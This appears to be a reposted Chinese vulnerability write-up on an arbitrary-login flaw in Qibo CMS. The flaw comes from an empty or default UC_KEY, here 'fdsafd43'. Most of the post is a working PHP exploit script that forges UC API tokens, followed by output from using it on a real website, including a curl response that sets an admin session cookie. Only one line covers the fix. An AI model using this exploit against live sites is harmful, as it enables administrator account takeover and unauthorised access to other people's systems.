齐博cms任意登陆漏洞

为什么80%的码农都做不了架构师？>>>

收集下，以后估计有用得到的时候

齐博cms整站系统（原PHP168）配置不当导致任意用户登陆，比如cms管理员等。

详细说明：

还是由于UC_CENTER的问题，之前闹过UC_KEY变量为空时可以调用UC_CENTER中的相关用户API直接进行操作，今天下了一份V7版本的源码，在uc_config.php中发现UC_KEY被初始化了

define('UC_DBCONNECT', '0');define('UC_KEY', 'fdsafd43'); //这里做了初始化define('UC_API', '/dz/uc_server');

Google了一把，发现很多站都可以用空的UC_KEY或默认的UC_KEY成功调用UC接口。

漏洞证明：

从官方成功案例中找到一个网站

$ php uc.php synlogin[+] UC_KEY 'null' can use .[*] EXP = do/api/uc.php?code=fca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr$ php uc.php synlogin[+] UC_KEY 'default' can use .[*] EXP = do/api/uc.php?code=c788q%2Byp%2F4oC5rvSuzpCpuLHRIYu9VIR%2Bzl8pJ60hOX8xYAxKoBajYXvRFG72oAadPVjFlAy8n6565gMUXPZNeKBXSQP0SDBJ9JPvq4XkLf4$ php uc.php synlogin[+] UC_KEY 'default' can use .[*] EXP = do/api/uc.php?code=7755%2FC0y9ZruP9op7MtO5lPx92MRfmUImcEf3ZmVIvDDjl8zpfKI%2FTEU6PwkKbW8QioWTD7nai2FaauVyAVTwICk6mrQwLvS6dsNawJyoPX51看看是否set cookie$ curl -I "/do/api/uc.php?code=fca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr"HTTP/1.0 200 OKDate: Wed, 15 Aug 06:23:32 GMTContent-Type: text/html; charset=gb2312Server: Microsoft-IIS/6.0X-Powered-By: X-Powered-By: PHP/5.2.8Set-Cookie: USR=lju34nhv%090%091345011812%09http%3A%2F%%2Fdo%2Fapi%2Fuc.php%3Fcode%3Dfca08oORxQ3xNG01MA1KO9cEPCcedNTThklj6RW2mzYoO9ReaVA4D6XZPJ06GSY0xrpCwNQD6YfusbP1nPJG0HsSB95BkMT6FcarqAVEamHr; expires=Thu, 16-Aug- 06:23:32 GMT; path=/; domain=Set-Cookie: choose_cityID=1; expires=Fri, 14-Sep- 06:23:32 GMT; path=/; domain=Set-Cookie: zone_id=1; expires=Fri, 14-Sep- 06:23:32 GMT; path=/; domain=P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"Set-Cookie: passport=1%09admin%09AFVdAg1SUwZVD1QDAFVdBwdXA1VRVAYAUAxXAFdUUlc%3D289d3139c3; expires=Thu, 16-Aug- 06:23:32 GMT; path=/; domain=X-Cache: MISS from WT263CDN-21172X-Cache-Lookup: MISS from WT263CDN-21172:80Via: 1.0 WT263CDN-21172 (squid/3.0.STABLE20)Connection: closeset了，在登陆网站试试exp:1<?phperror_reporting(0);$host = $argv[1];$doing = $argv[2];if (empty($doing)) {$doing = 'test';$code = 'time=1577811661&action='.$doing;} else {$code = 'time=1577811661&uid=1&username=admin&action='.$doing;}$uc_key = array('null' => '', 'default' => 'fdsafd43');foreach ($uc_key as $key => $value) {$exp = 'do/api/uc.php?code='.urlencode(authcode($code, "ENCODE", $value));$result = file_get_contents("http://$host/$exp");if( $result == 1 || $result !== 'Authracation has expiried'){echo "[+] UC_KEY '$key' can use .\r\n";echo "[*] EXP = $exp \r\n";}}function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {$ckey_length = 4;$key = md5($key ? $key : UC_KEY);$keya = md5(substr($key, 0, 16));$keyb = md5(substr($key, 16, 16));$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';$cryptkey = $keya.md5($keya.$keyc);$key_length = strlen($cryptkey);$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;$string_length = strlen($string);$result = '';$box = range(0, 255);$rndkey = array();for($i = 0; $i <= 255; $i++) {$rndkey[$i] = ord($cryptkey[$i % $key_length]);}for($j = $i = 0; $i < 256; $i++) {$j = ($j + $box[$i] + $rndkey[$i]) % 256;$tmp = $box[$i];$box[$i] = $box[$j];$box[$j] = $tmp;}for($a = $j = $i = 0; $i < $string_length; $i++) {$a = ($a + 1) % 256;$j = ($j + $box[$a]) % 256;$tmp = $box[$a];$box[$a] = $box[$j];$box[$j] = $tmp;$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));}if($operation == 'DECODE') {if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);} else {return '';}} else {return $keyc.str_replace('=', '', base64_encode($result));}}

修复方案：

安装的时候随即字符串重写。

如果觉得《齐博cms任意登陆漏洞》对你有帮助，请点赞、收藏，并留下你的观点哦！